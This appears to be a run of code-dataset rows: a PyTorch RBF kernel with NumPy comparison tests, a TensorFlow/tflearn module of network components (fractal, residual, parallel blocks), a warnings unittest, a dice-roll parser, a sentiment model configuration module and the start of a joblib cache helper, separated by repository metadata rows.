length_scale : Union[float, torch.tensor, np.ndarray], optional
            Lengthscale estimated from the data. Can be either a single float,
            or a vector of floats for different lengthscales for each dimension.
            The default is 1.0.
        signal_variance : float, optional
            This is not used yet. The default is 1.0.
device : Union[bool,str], optional
Selected device where the computations will be executed,i.e. cpu or gpu.
The default is None, which executes calculations on the cpu.
multil : Union[bool, None], optional
Boolean indicator determining whether lengthscale is a vector or a
single value. The default is False.
TO DO: Remove this option and just check whether length_scale input
is a vector or a single float.
Returns
-------
Instance of the object.
"""
# initialize parameters
if device is None:
self.device = torch.device("cpu")
else:
self.device = device
self.length_scale = torch.tensor(length_scale, dtype=torch.float32, device=self.device,
requires_grad=True)
self.signal_variance = torch.tensor(signal_variance, dtype=torch.float32, device=self.device,
requires_grad=True)
self.multil = torch.tensor(multil, dtype=torch.bool, device=self.device, requires_grad=False)
if self.multil:
            ##expand dimensions of lengthscale vector to enable broadcasting
self.length_scale = self.length_scale[None, None, :]
self.K_data = torch.tensor(0, dtype=torch.float32, device=self.device, requires_grad=False)
def Kernel(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
if not torch.is_tensor(X):
# convert inputs to pytorch tensors if not already pytorched
X = torch.tensor(X, dtype=torch.float32, device=self.device)
N, D = X.shape
if Y is None:
Y = X
elif not torch.is_tensor(Y):
Y = torch.tensor(Y, dtype=torch.float32, device=self.device)
M, _ = Y.shape
# Re-indexing
X_i = X[:, None, :] # shape (N, D) -> (N, 1, D)
Y_j = Y[None, :, :] # shape (M, D) -> (1, M, D)
if not self.multil: ##if a single lengthscale is provided
# |X_i - Y_j|^2 # (N, M, D)
sqd = torch.sum( (X_i - Y_j)**2, 2)
# Divide by length scale
sqd = torch.div(sqd, self.length_scale.to(self.device)**2)
K = torch.exp( -0.5* sqd )
else:
sqd1 = torch.div( (X_i - Y_j)**2, self.length_scale.to(self.device)**2)
sqd = torch.sum( sqd1, 2)
K = torch.exp( -0.5* sqd )
K = torch.mul(self.signal_variance, K) # Signal Variance
self.K_data = K
return K#.detach().to_numpy()
def gradient_X(self, X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
N, D = X.shape
M,_ = Y.shape
diffs = X[:,None]-Y
redifs = torch.div(diffs, self.length_scale.to(self.device)**2)
redifs = torch.einsum( 'ijk,ij->ijk', redifs, self.K_data)
return redifs
def gradient_X2(self, X):
return None
def gradient_XX(self,X: np.ndarray, Y: Union[bool, np.ndarray]=None) -> np.ndarray:
# Convert to tensor that requires Grad
X = torch.tensor(self.length_scale, dtype=torch.float32, device=self.device,requires_grad=True)
if Y is None:
Y = X
else:
Y = torch.tensor(Y, dtype=torch.float32, device=self.device, requires_grad=True)
# compute the gradient kernel w.r.t. to the two inputs
J = grad(self.__call__(X, Y))
return J
def gradient_XX2(self, X, Y=None):
return None
#%% numpy versions of kernels functions
def Knp(x,y,l,multil=False):
if multil:
res = np.ones((x.shape[0],y.shape[0]))
for ii in range(len(l)):
tempi = np.zeros((x[:,ii].size, y[:,ii].size ))
##puts into tempi the cdist result
tempi = cdist(x[:,ii].reshape(-1,1), y[:,ii].reshape(-1,1),metric='sqeuclidean')
res = np.multiply(res,np.exp(-tempi/(2*l[ii]*l[ii])))
return res
else:
tempi = np.zeros((x.shape[0], y.shape[0] ))
tempi = cdist(x, y,'sqeuclidean') #this sets into the array tempi the cdist result
return np.exp(-0.5*tempi/(l*l))
def grdx_K_all(x,y,l,multil=False): #gradient with respect to the 1st argument - only which_dim
N,dim = x.shape
M,_ = y.shape
diffs = x[:,None]-y
redifs = np.zeros((1*N,M,dim))
for ii in range(dim):
if multil:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l,True))/(l[ii]*l[ii])
else:
redifs[:,:,ii] = np.multiply(diffs[:,:,ii],Knp(x,y,l))/(l*l)
return redifs
#%%
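# Smoke tests: compare the torch kernel and its gradient against the NumPy reference
# implementations above, for both a single shared lengthscale and per-dimension
# lengthscales.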
DEVICE = set_device()
dtype = torch.float
dim = 2
N = 3
M = 4
X = torch.randn(N, dim, device=DEVICE)
Z = torch.randn(M, dim, device=DEVICE)
# common device agnostic way of writing code that can run on cpu OR gpu
# that we provide for you in each of the tutorials
#%% test kernel evaluation with single lengthscale
lengthsc = 2
# pytorched
K_instance = RBF(length_scale=lengthsc, multil=False, device=DEVICE) ##instance of kernel object - non-evaluated
if DEVICE=='cpu':
Ktorch = K_instance.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).detach().numpy()
else:
Ktorch = K_instance.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
#%% test kernel evaluation with multiple lengthscales
lengthsc = np.array([1,2])
# pytorched
if DEVICE=='cpu':
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).detach().numpy()
else:
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
| 37.683453 | 180 | 0.612447 | 5,834 | 0.556892 | 0 | 0 | 0 | 0 | 0 | 0 | 4,112 | 0.392516 |
f1f6905a9916f479816181eeb443cb6b650cc61b
| 11,075 |
py
|
Python
|
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import tensorflow as tf
import tflearn
from tflearn import variables as vs
from tflearn import activations
from tflearn import initializations
from tflearn import losses
from tflearn import utils
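# Composable network-building blocks on top of tflearn: Sequence and Chain apply their
# blocks one after another, Parallel sums its branches and supports FractalNet-style
# local/global drop-path during training, Fractal expands a block into the recursive
# fractal pattern, Residual adds an identity branch around a block, and
# Conv2d/ShallowResidualBlock wrap common layer types.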
def condition(cond, t, f):
if cond is True:
return t
elif cond is False:
return f
else:
return tf.cond(cond, lambda: t, lambda: f)
class objectview(object):
def __init__(self, d):
self.__dict__.update(d)
componentInherit = {
'globalDroppath': False,
'localDroppath': False,
'localDroppathProb': .5,
'parentType': '',
'currentType': ''
}
class TFComponent:
def __getitem__(self, incoming):
global componentInherit
inheritBak = componentInherit.copy()
if 'localDroppath' in self.opts:
componentInherit['localDroppath'] = self.opts['localDroppath']
if 'globalDroppath' in self.opts:
componentInherit['globalDroppath'] = self.opts['globalDroppath']
componentInherit['parentType'] = componentInherit['currentType']
componentInherit['currentType'] = type(self).__name__
opts = objectview(self.opts)
if isinstance(incoming, TFComponentVal) and (not hasattr(self, 'noDirect')):
incoming = incoming.resolve()
net = self.get(incoming, opts, componentInherit)
if isinstance(net, TFComponentVal) and componentInherit['parentType'] is '':
net = net.resolve()
componentInherit = inheritBak
return net
class TFComponentVal:
pass
class Identity(TFComponent):
def __init__(self, **kwargs):
self.noDirect = True
self.opts = {
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
return incoming
class Sequence(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Sequence"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for blk in self.blocks:
resnet = blk[resnet]
return resnet
class ParallelVal(TFComponentVal):
def __init__(self, opts, inherit, scope):
self.blocks = list()
self.opts = opts
self.inherit = inherit
self.scope = scope
def resolve(self):
opts = self.opts
inherit = self.inherit
with tf.name_scope(self.scope):
is_training = tflearn.get_training_mode()
blocks = tf.pack(self.blocks)
basic = tf.reduce_sum(blocks, 0)
oneChoice = tf.random_uniform([], maxval=len(self.blocks), dtype='int32')
one = tf.cond(is_training, lambda: tf.gather(blocks,oneChoice), lambda: basic)
someChoice = tf.less(tf.random_uniform([len(self.blocks)]), inherit['localDroppathProb'])
some = tf.cond(is_training, lambda: tf.reduce_sum(tf.boolean_mask(blocks,someChoice), 0), lambda: basic)
some = tf.cond(tf.reduce_any(someChoice), lambda: some, lambda: one)
resnet = condition(inherit['globalDroppath'], one, condition(inherit['localDroppath'], some, basic))
return resnet
class Parallel(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Parallel"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name) as scope:
blocksMixed = [blk[resnet] for blk in self.blocks]
blocks = ParallelVal(opts, inherit, scope)
for blk in blocksMixed:
if isinstance(blk, ParallelVal):
blocks.blocks = blocks.blocks + blk.blocks
else:
blocks.blocks.append(blk)
return blocks
class Chain(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Chain"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for i in range(self.size):
resnet = self.block[resnet]
return resnet
class Fractal(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Fractal"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
if self.size <= 1:
return self.block[resnet]
else:
sub = Fractal(self.size-1, self.block)
resnet = Parallel([self.block, Chain(2, sub)])[resnet]
return resnet
class Residual(TFComponent):
def __init__(self, block, **kwargs):
self.noDirect = True
self.block = block
self.opts = {
'name': "Residual"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
            resnet = Parallel([Identity(), self.block])[resnet]
return resnet
class Conv2d(TFComponent):
def __init__(self, nb_filter, filter_size, **kwargs):
self.nb_filter = nb_filter
self.filter_size = filter_size
self.opts = {
'strides': 1,
'padding': 'same',
'activation': 'linear',
'bias': True,
'weights_init': 'uniform_scaling',
'bias_init': 'zeros',
'regularizer': None,
'weight_decay': 0.001,
'trainable': True,
'restore': True,
'name': "Conv2D"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
assert opts.padding in ['same', 'valid', 'SAME', 'VALID'], \
"Padding must be same' or 'valid'"
input_shape = utils.get_incoming_shape(incoming)
assert len(input_shape) == 4, "Incoming Tensor shape must be 4-D"
filter_size = utils.autoformat_filter_conv2d(self.filter_size,
input_shape[-1],
self.nb_filter)
strides = utils.autoformat_kernel_2d(opts.strides)
padding = utils.autoformat_padding(opts.padding)
with tf.name_scope(opts.name) as scope:
W_init = opts.weights_init
if isinstance(opts.weights_init, str):
W_init = initializations.get(opts.weights_init)()
W_regul = None
if opts.regularizer:
W_regul = lambda x: losses.get(opts.regularizer)(x, opts.weight_decay)
W = vs.variable(scope + 'W', shape=filter_size,
regularizer=W_regul, initializer=W_init,
trainable=opts.trainable, restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, W)
b = None
if opts.bias:
b_init = initializations.get(opts.bias_init)()
b = vs.variable(scope + 'b', shape=self.nb_filter,
initializer=b_init, trainable=opts.trainable,
restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, b)
inference = tf.nn.conv2d(incoming, W, strides, padding)
            if b is not None: inference = tf.nn.bias_add(inference, b)
if isinstance(opts.activation, str):
inference = activations.get(opts.activation)(inference)
            elif hasattr(opts.activation, '__call__'):
                inference = opts.activation(inference)
else:
raise ValueError("Invalid Activation.")
# Track activations.
tf.add_to_collection(tf.GraphKeys.ACTIVATIONS, inference)
# Add attributes to Tensor to easy access weights.
inference.scope = scope
inference.W = W
inference.b = b
return inference
class ShallowResidualBlock(TFComponent):
def __init__(self, out_channels, **kwargs):
self.out_channels = out_channels
self.opts = {
'downsample': False,
'downsample_strides': 2,
'activation': 'relu',
'batch_norm': True,
'bias': True,
'weights_init': 'variance_scaling',
'bias_init': 'zeros',
'regularizer': 'L2',
'weight_decay': 0.0001,
'trainable': True,
'restore': True,
'name': 'ResidualBlock'
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
in_channels = incoming.get_shape().as_list()[-1]
with tf.name_scope(opts.name):
identity = resnet
            if not opts.downsample:
opts.downsample_strides = 1
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
            resnet = tflearn.conv_2d(resnet, self.out_channels, 3,
opts.downsample_strides, 'same', 'linear',
opts.bias, opts.weights_init, opts.bias_init,
opts.regularizer, opts.weight_decay, opts.trainable,
opts.restore)
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
            resnet = tflearn.conv_2d(resnet, self.out_channels, 3, 1, 'same',
'linear', opts.bias, opts.weights_init,
opts.bias_init, opts.regularizer, opts.weight_decay,
opts.trainable, opts.restore)
# Downsampling
if opts.downsample_strides > 1:
identity = tflearn.avg_pool_2d(identity, 1,
opts.downsample_strides)
# Projection to new dimension
if in_channels != self.out_channels:
ch = (self.out_channels - in_channels)//2
identity = tf.pad(identity,
[[0, 0], [0, 0], [0, 0], [ch, ch]])
in_channels = self.out_channels
#resnet = resnet + identity
return resnet
| 34.182099 | 116 | 0.557562 | 10,433 | 0.942032 | 0 | 0 | 0 | 0 | 0 | 0 | 1,100 | 0.099323 |
f1f9c0eee8a8c52481a3d1792850e6310a0a8163
| 1,984 |
py
|
Python
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 421 |
2015-06-02T16:29:59.000Z
|
2021-06-03T18:44:42.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 404 |
2015-06-02T20:23:42.000Z
|
2019-08-21T16:59:41.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 16 |
2015-06-16T17:21:02.000Z
|
2020-03-27T02:27:09.000Z
|
from ..testcases import DustyTestCase
from dusty.warnings import Warnings
class TestWarnings(DustyTestCase):
def setUp(self):
super(TestWarnings, self).setUp()
self.warnings = Warnings()
def test_warn(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Yo this thing is also wrong'
self.warnings.warn('test', message_1)
self.assertItemsEqual(self.warnings._stored, {'test': [message_1]})
self.warnings.warn('test', message_2)
self.assertItemsEqual(self.warnings._stored, {'test': [message_1, message_2]})
def test_has_warnings(self):
self.assertFalse(self.warnings.has_warnings)
self.warnings.warn('test', 'yo')
self.assertTrue(self.warnings.has_warnings)
def test_pretty_with_no_warnings(self):
self.assertEqual(self.warnings.pretty(), "")
def test_pretty(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Something is very wrong, and that something takes way more than 80 characters to communicate the fact that it is wrong'
self.warnings.warn('test', message_1)
self.warnings.warn('test', message_2)
self.assertEqual(self.warnings.pretty(), "WARNING (test): Something is wrong, yo\nWARNING (test): Something is very wrong, and that something takes way more than 80 characters to\ncommunicate the fact that it is wrong\n")
def test_clear_namespace(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('test')
self.assertEqual(len(self.warnings._stored['test']), 0)
def test_clear_namespace_leaves_others_unaffected(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('some-other-namespace')
self.assertEqual(len(self.warnings._stored['test']), 1)
| 45.090909 | 229 | 0.689516 | 1,907 | 0.96119 | 0 | 0 | 0 | 0 | 0 | 0 | 536 | 0.270161 |
f1fa3f6469623ef44f7b253d9c5da8307b330081
| 4,655 |
py
|
Python
|
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
from random import randint
import re
# Supported formats:
# [A]dX[(L|H|K)n][.Y1[.Y2[...]]]
# A - number of dice
# X - number of sides of dice
# . - operation: allowed are + - * x /
# Ln/Hn/Kn - discard the Lowest n dice or Keep the Highest n dice. - will only apply the first of these, in order LHK
# Y1,Y2,... - operand
# warning: doesn't respect order of operations. So +5*3 will first add 5, then multiply by 3.
# example: 4d6+3 rolls 4 dice with 6 faces each, afterwards adds 3.
# Thanks to tara, maximum number of allowed dice/faces is 999.
# Parse a single dice roll
def randomDice(dice):
try:
# Format for the whole roll
diceexp = re.compile('(?:\D+)?(\d{0,3})d(\d{1,3})((([\+\-\*x\/LH])(\d+))+)?',re.IGNORECASE)
# Format for modifiers
addsexp = re.compile('[\+\-\*x\/LH]\d+',re.IGNORECASE)
numexp = re.compile('(\d+)')
m = diceexp.match(dice)
# Result of rolls
result = 0
rolls = []
# Weird input?
if not m:
return 0
# Get the number of dice to roll
dicenum = 0
if m.group(1) == "" or m.group(1) == None:
dicenum = 1
else:
dicenum = int(m.group(1))
# Get the number of faces on each dice
facenum = int(m.group(2))
# Roll the dice
for i in range(dicenum):
rolls.append(randint(1,facenum))
# result += randint(1,facenum)
# sort the rolls for further processing
rolls.sort()
if 'l' in dice.lower():
index = dice.lower().find('l') + 1
number = int(numexp.match(dice[index:]).group())
# Can't drop more dice than available, drop all of them
if number > dicenum:
return 0
for i in range(number,len(rolls)):
result += rolls[i]
elif 'h' in dice.lower():
index = dice.lower().find('h') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
elif 'k' in dice.lower():
index = dice.lower().find('k') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
else:
for i in range(len(rolls)):
result += rolls[i]
# Any modifiers present?
if not m.group(3) == None:
# Split them up
n = addsexp.findall(m.group(3))
# Modifiers
for i in range(len(n)):
# Value of modifier
modval = int(n[i][1:])
# Type of modifier
if n[i][0] == '+':
result += modval
elif n[i][0] == '-':
result -= modval
elif n[i][0] in '*x':
result *= modval
elif n[i][0] == '/':
result /= modval
return result
except:
return None
# Parse a whole expression.
#
# Format: dice1[+dice2[+dice3[...]]]
# dice1, dice2, dice3, ...: Any valid dice format as written in the randomDice function.
#
# Returns: The total of all rolls as integer, None if there was no valid dice notation found
def dnDice(dice):
# Pattern
diceexp1 = re.compile('(\d{0,3}d\d{1,3})(([\+\-\*x\/HLK]\d+(?!d))+)?', re.IGNORECASE)
# Total roll
total = 0
results = diceexp1.findall(dice)
if len(results) == 0:
return None
else:
# Total up the rolls
for d in results:
string = ""
# Discard the last part of the matched expression, it's a weird duplicate, join the rest together (the modifiers get split off)
			for part in d[:-1]:
string += part
t = randomDice(string)
if t == None:
return None
else:
try:
					total += t
except:
return None
return total
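# Minimal usage sketch of the two parsers above (the expressions are arbitrary
# examples; the printed totals are random):
if __name__ == '__main__':
	for expr in ('4d6L1+2', '2d8+3 1d20', 'd20'):
		print(expr, '->', dnDice(expr))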
| 34.738806 | 140 | 0.478195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,631 | 0.350376 |
f1fbbda465699c148d64aca8b6b9736f618761e2
| 2,471 |
py
|
Python
|
cfg/configure_model.py
|
dadelani/sentiment-discovery
|
0cbfc5f6345dacbf52f1f806a9e136a61ca35cf8
|
[
"BSD-3-Clause"
] | 2 |
2019-04-24T08:23:54.000Z
|
2020-06-24T10:25:34.000Z
|
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | null | null | null |
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | 1 |
2019-03-23T08:07:33.000Z
|
2019-03-23T08:07:33.000Z
|
import os
from sentiment_discovery.reparameterization import remove_weight_norm
from sentiment_discovery.model import make_model
class ModuleConfig(object):
def __init__(self, parser):
super(ModuleConfig, self).__init__()
self.parser = parser
def apply(self, cfg, opt):
"""make model and format model path for reloading parameters"""
print('configuring model')
cell_type = opt.rnn_type
num_layers = opt.layers
embed_size = opt.embed_size
hidden_size = opt.rnn_size
# set in configure_data
data_size = opt.data_size
dropout = opt.dropout
w_norm = opt.weight_norm
lstm_only = opt.lstm_only
saved_path = ''
if opt.load_model != '':
model_dir = cfg.logger.get_log_dir(opt.model_dir)
saved_path = os.path.join(model_dir, opt.load_model)
print(embed_size)
model, recurrent_module, embedder_module, chkpt = make_model(
cell_type=cell_type, num_layers=num_layers,
embed_size=embed_size, hidden_size=hidden_size,
data_size=data_size, dropout=dropout, weight_norm=w_norm,
lstm_only=lstm_only, saved_path=saved_path)
cfg.model = model
cfg.chkpt = chkpt
nParams = sum([p.nelement() for p in cfg.model.parameters()])
print('* number of parameters: %d' % nParams)
def configure_model(parser):
"""add cmdline args for configuring models"""
parser.add_argument('-load_model', default='',
help="""a specific checkpoint file to load from experiment's model directory""")
parser.add_argument('-should_test', action='store_true',
help='whether to train or evaluate a model')
parser.add_argument('-model_dir', default='model',
help='directory where models are saved to/loaded from')
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the rnn')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=64,
help='Size of embeddings')
parser.add_argument('-weight_norm', action='store_true',
help='whether to use weight normalization for training NNs')
parser.add_argument('-lstm_only', action='store_true',
						help='if `-weight_norm` is applied to the model, apply it to the lstm parameters only')
parser.add_argument('-dropout', type=float, default=0.1,
help='Dropout probability.')
return ModuleConfig(parser)
| 39.854839 | 93 | 0.718737 | 1,115 | 0.451234 | 0 | 0 | 0 | 0 | 0 | 0 | 763 | 0.308782 |
f1fcac439aa33bb2b7ada9c60628d61b4b1afd6c
| 4,309 |
py
|
Python
|
tests/backends/console/test_env.py
|
j5api/j5
|
d3158cfd3d0d19ed33aba0c5c2c1f17a38fe12c7
|
[
"MIT"
] | 10 |
2019-01-19T13:09:37.000Z
|
2021-06-18T13:40:10.000Z
|
tests/backends/console/test_env.py
|
j5api/j5
|
d3158cfd3d0d19ed33aba0c5c2c1f17a38fe12c7
|
[
"MIT"
] | 681 |
2019-01-22T18:12:23.000Z
|
2022-03-25T14:14:31.000Z
|
tests/backends/console/test_env.py
|
j5api/j5
|
d3158cfd3d0d19ed33aba0c5c2c1f17a38fe12c7
|
[
"MIT"
] | 8 |
2019-02-22T21:45:47.000Z
|
2021-11-17T19:43:33.000Z
|
"""Tests for the ConsoleEnvironment and Console helper."""
from j5.backends.console import Console
def test_console_instantiation() -> None:
"""Test that we can create a console."""
console = Console("MockConsole")
assert type(console) is Console
assert console._descriptor == "MockConsole"
def test_console_info() -> None:
"""Test that the console can output information."""
class MockPrintConsole(Console):
"""Define a testing print function."""
def _print(self, text: str) -> None:
"""Mock printing function."""
assert text == "TestBoard: Test the console info"
console = MockPrintConsole("TestBoard")
console.info("Test the console info")
def test_console_read() -> None:
"""Test that we can read from the console."""
class MockInputConsole(Console):
"""Define a testing input function."""
def _input(self, prompt: str) -> str:
"""Mock some input."""
return str(reversed(prompt))
console = MockInputConsole("TestBoard")
assert str(console.read("Enter Test Input")) == str(reversed("Enter Test Input"))
def test_console_read_none_type() -> None:
"""Test that we can read None from console, i.e any input."""
class ConsoleNone(Console):
"""Define a testing input function."""
def _input(self, prompt: str) -> str:
"""Mock some input."""
return "string"
console = ConsoleNone("TestBoard")
assert console.read("Enter test input", None) is None
def test_console_read_bad_type() -> None:
"""Test that the console emits an error if it cannot cast to the desired type."""
class MockConsoleWithState(Console):
"""A mock console with state."""
def __init__(self, descriptor: str) -> None:
super().__init__(descriptor)
self.bad_attempt_count = 0
def _input(self, prompt: str) -> str: # noqa: A003
"""Mock some input."""
if self.bad_attempt_count == 0:
self.bad_attempt_count += 1
return "Not an int"
return "6"
def _print(self, text: str) -> None: # noqa: A003,T002
"""Mock printing function."""
if self.bad_attempt_count == 0:
assert text == "TestConsole: Unable to construct a int from 'Not an int'"
console = MockConsoleWithState("TestConsole")
assert console.read("I want an int", int) == 6
def test_console_handle_boolean_correctly() -> None:
"""Test that the console handles bools correctly."""
class MockConsoleBoolean(Console):
"""A mock console with state."""
true_cases = ["yes", "YES", "YeS", "True"]
false_cases = ["no", "NO", "No", "False"]
extra_cases = ["bees", "foo", "0", "True"]
def __init__(self, descriptor: str) -> None:
super().__init__(descriptor)
self._pos = 0
self.cases = self.true_cases + self.false_cases + self.extra_cases
def _input(self, prompt: str) -> str: # noqa: A003
"""Mock some input."""
val = self.cases[self._pos]
self._pos += 1
return val
def _print(self, text: str) -> None: # noqa: A003,T002
"""Mock printing function."""
if self._pos in [8, 9, 10, 11]:
assert text == f"TestConsole: Unable to construct a bool " \
f"from '{self.cases[self._pos - 1]}'"
else:
raise AssertionError()
@property
def is_finished(self) -> bool:
"""Check if all of the cases have been consumed."""
return self._pos == len(self.cases)
console = MockConsoleBoolean("TestConsole")
for _ in MockConsoleBoolean.true_cases:
val = console.read("I want an bool", bool, check_stdin=False)
assert isinstance(val, bool)
assert val
for _ in MockConsoleBoolean.false_cases:
val = console.read("I want an bool", bool, check_stdin=False)
assert isinstance(val, bool)
assert not val
    # Test that unparsable inputs are skipped until a valid one ('True') is read.
val = console.read("I want an bool", bool, check_stdin=False)
assert isinstance(val, bool)
assert val
assert console.is_finished
| 31.918519 | 89 | 0.598283 | 2,437 | 0.56556 | 0 | 0 | 160 | 0.037132 | 0 | 0 | 1,365 | 0.316779 |
f1ff198ad462185fb2910c252e87000aebf824f5
| 6,351 |
py
|
Python
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | 2 |
2021-01-11T20:09:32.000Z
|
2021-05-14T14:52:48.000Z
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
from os import listdir, remove, makedirs
from os.path import isfile, join, exists
import shutil
import joblib
from termcolor import cprint
import json
from pathlib import Path
_cache_path = None
_log_actions = True
def init(cache_path, log_actions=True):
"""
Initializes the cache.
Keyword Arguments:
- cache_path: directory where cached files are saved
- log_actions: when true, all actions are logged
"""
global _cache_path, _log_actions
_log_actions = log_actions
_cache_path = cache_path
try:
if not exists(cache_path):
makedirs(cache_path)
except Exception as e:
cprint(e, 'red')
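# Hedged usage sketch of this module (the import path, cache directory and file
# names below are hypothetical; adapt them to the backend's package layout):
#
#   import cache
#   cache.init('/tmp/clavis_cache')
#   cache.write('model.pkl', {'weights': [1, 2, 3]})
#   restored = cache.read('model.pkl')
#   print(cache.entries())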
def write(filename, data):
"""
Pickles a file and writes it to the cache.
Keyword Arguments:
- filename: name of the file to write to
- data: object to cache
"""
if _log_actions:
cprint('Writing to cache: "{}"'.format(filename), 'green')
joblib.dump(data, join(_cache_path, filename))
def write_plain(filename, data, add_extension=True):
"""
Simply writes the textual data to a file.
"""
if _log_actions:
cprint('Writing to cache (plain): "{}"'.format(filename), 'green')
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(data)
def write_dict_json(filename, data, add_extension=True):
"""
Writes a dictionary to file using JSON format.
"""
if _log_actions:
cprint('Writing to cache (json): "{}"'.format(filename), 'green')
